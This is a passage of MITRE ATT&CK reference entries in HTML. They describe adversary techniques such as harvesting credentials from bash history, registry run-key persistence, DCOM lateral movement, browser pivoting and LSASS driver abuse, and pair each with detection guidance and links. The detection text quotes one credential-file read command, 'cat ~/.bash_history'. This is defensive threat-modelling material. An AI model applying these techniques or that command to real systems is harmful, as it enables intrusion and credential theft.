<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/aa364404">http://msdn.microsoft.com/en-us/library/aa364404</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bash_history_t1139"><a class="anchor" href="#_bash_history_t1139"></a><a class="link" href="#_bash_history_t1139">Bash History - T1139</a></h3>
<div class="paragraph">
<p>Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the users &lt;code&gt;.bash_history&lt;/code&gt; file. For each user, this file resides at the same location: &lt;code&gt;~/.bash_history&lt;/code&gt;. Typically, this file keeps track of the users last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring when the user&#8217;s &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 749. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1139">https://attack.mitre.org/wiki/Technique/T1139</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way">http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_process_discovery_t1057"><a class="anchor" href="#_process_discovery_t1057"></a><a class="link" href="#_process_discovery_t1057">Process Discovery - T1057</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>An example command that would obtain details on processes is "tasklist" using the Tasklist utility.</p>
</div>
<div class="paragraph">
<p>===Mac and Linux===</p>
</div>
<div class="paragraph">
<p>In Mac and Linux, this is accomplished with the &lt;code&gt;ps&lt;/code&gt; command.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>System Requirements: Administrator, SYSTEM may provide better process ownership details</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 750. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1057">https://attack.mitre.org/wiki/Technique/T1057</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_firmware_t1019"><a class="anchor" href="#_system_firmware_t1019"></a><a class="link" href="#_system_firmware_t1019">System Firmware - T1019</a></h3>
<div class="paragraph">
<p>The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)</p>
</div>
<div class="paragraph">
<p>System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.</p>
</div>
<div class="paragraph">
<p>Detection: System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.</p>
</div>
<div class="paragraph">
<p>Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, BIOS, EFI</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Ryan Becwar, McAfee</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 751. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1019">https://attack.mitre.org/wiki/Technique/T1019</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/BIOS">https://en.wikipedia.org/wiki/BIOS</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Unified%20Extensible%20Firmware%20Interface">https://en.wikipedia.org/wiki/Unified%20Extensible%20Firmware%20Interface</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.uefi.org/about">http://www.uefi.org/about</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research">http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about">http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/">https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/chipsec/chipsec">https://github.com/chipsec/chipsec</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html">http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_registry_run_keys_start_folder_t1060">Registry Run Keys / Start Folder - T1060</a></h3>
<div class="paragraph">
<p>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) The program will be executed under the context of the user and will have the account&#8217;s associated permissions level.</p>
</div>
<div class="paragraph">
<p>Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.</p>
</div>
<div class="paragraph">
<p>Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, File monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 752. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1060">https://attack.mitre.org/wiki/Technique/T1060</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/aa376977">http://msdn.microsoft.com/en-us/library/aa376977</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_service_execution_t1035"><a class="anchor" href="#_service_execution_t1035"></a><a class="link" href="#_service_execution_t1035">Service Execution - T1035</a></h3>
<div class="paragraph">
<p>Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.</p>
</div>
<div class="paragraph">
<p>Detection: Changes to service Registry entries and command-line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool PsExec.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Remote Support: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 753. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1035">https://attack.mitre.org/wiki/Technique/T1035</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uncommonly_used_port_t1065"><a class="anchor" href="#_uncommonly_used_port_t1065"></a><a class="link" href="#_uncommonly_used_port_t1065">Uncommonly Used Port - T1065</a></h3>
<div class="paragraph">
<p>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Netflow/Enclave netflow, Process use of network, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 754. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1065">https://attack.mitre.org/wiki/Technique/T1065</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_distributed_component_object_model_t1175"><a class="anchor" href="#_distributed_component_object_model_t1175"></a><a class="link" href="#_distributed_component_object_model_t1175">Distributed Component Object Model - T1175</a></h3>
<div class="paragraph">
<p>Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology. COM is a component of the Windows application programming interface (API) that enables interaction between software objects. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).</p>
</div>
<div class="paragraph">
<p>Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM) ACL (Citation: Microsoft Process Wide Com Keys) (Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.</p>
</div>
<div class="paragraph">
<p>Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods. (Citation: Enigma MMC20 COM Jan 2017) (Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for COM objects loading DLLs and other modules not typically associated with the application. (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017)</p>
</div>
<div class="paragraph">
<p>Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.</p>
</div>
<div class="paragraph">
<p>Monitor for influx of Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Authentication logs, DLL monitoring, Packet capture, Process monitoring, Windows Registry, Windows event logs</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 755. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1175">https://attack.mitre.org/wiki/Technique/T1175</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx">https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/">https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/">https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/">https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/">https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom">https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_startup_items_t1165"><a class="anchor" href="#_startup_items_t1165"></a><a class="link" href="#_startup_items_t1165">Startup Items - T1165</a></h3>
<div class="paragraph">
<p>Per Apples documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, &lt;code&gt;/Library/StartupItems&lt;/code&gt; isnt guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), &lt;code&gt;StartupParameters.plist&lt;/code&gt;, reside in the top-level directory.</p>
</div>
<div class="paragraph">
<p>An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.</p>
</div>
<div class="paragraph">
<p>Detection: The &lt;code&gt;/Library/StartupItems&lt;/code&gt; folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: root</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 756. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1165">https://attack.mitre.org/wiki/Technique/T1165</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_man_in_the_browser_t1185"><a class="anchor" href="#_man_in_the_browser_t1185"></a><a class="link" href="#_man_in_the_browser_t1185">Man in the Browser - T1185</a></h3>
<div class="paragraph">
<p>Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)</p>
</div>
<div class="paragraph">
<p>A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot)</p>
</div>
<div class="paragraph">
<p>Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary&#8217;s browser through the user&#8217;s browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user&#8217;s traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication (Citation: cobaltstrike manual).</p>
</div>
<div class="paragraph">
<p>Detection: This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, Packet capture, Process Monitoring, API monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Justin Warner, ICEBRG</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 757. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1185">https://attack.mitre.org/wiki/Technique/T1185</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Man-in-the-browser">https://en.wikipedia.org/wiki/Man-in-the-browser</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cobaltstrike.com/help-browser-pivoting">https://www.cobaltstrike.com/help-browser-pivoting</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://cobaltstrike.com/downloads/csmanual38.pdf">https://cobaltstrike.com/downloads/csmanual38.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lc_load_dylib_addition_t1161"><a class="anchor" href="#_lc_load_dylib_addition_t1161"></a><a class="link" href="#_lc_load_dylib_addition_t1161">LC_LOAD_DYLIB Addition - T1161</a></h3>
<div class="paragraph">
<p>Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long adjustments are made to the rest of the fields and dependencies (Citation: Writing Bad Malware for OSX). There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isnt checked at load time (Citation: Malware Persistence on OS X).</p>
</div>
<div class="paragraph">
<p>Detection: Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Binary file metadata, Process Monitoring, Process command-line parameters, File monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 758. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1161">https://attack.mitre.org/wiki/Technique/T1161</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf">https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf">https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lsass_driver_t1177"><a class="anchor" href="#_lsass_driver_t1177"></a><a class="link" href="#_lsass_driver_t1177">LSASS Driver - T1177</a></h3>
<div class="paragraph">
<p>The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)</p>
</div>
<div class="paragraph">
<p>Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., DLL Side-Loading or DLL Search Order Hijacking), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.</p>
</div>
<div class="paragraph">
<p>Detection: With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014)</p>
</div>
<div class="paragraph">
<p>Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA.</p>
</div>
<div class="paragraph">
<p>Utilize the Sysinternals Process Monitor utility to monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, DLL monitoring, File monitoring, Kernel drivers, Loaded DLLs, Process Monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<div class="paragraph">
<p>Contributors: Vincent Le Toux</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 759. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1177">https://attack.mitre.org/wiki/Technique/T1177</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/cc961760.aspx">https://technet.microsoft.com/library/cc961760.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/dn408187.aspx">https://technet.microsoft.com/library/dn408187.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx">https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_staged_t1074"><a class="anchor" href="#_data_staged_t1074"></a><a class="link" href="#_data_staged_t1074">Data Staged - T1074</a></h3>
<div class="paragraph">
<p>Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Data Compressed or Data Encrypted.</p>
</div>
<div class="paragraph">
<p>Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.</p>
</div>
<div class="paragraph">
<p>Detection: Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 760. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1074">https://attack.mitre.org/wiki/Technique/T1074</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_new_service_t1050"><a class="anchor" href="#_new_service_t1050"></a><a class="link" href="#_new_service_t1050">New Service - T1050</a></h3>
<div class="paragraph">
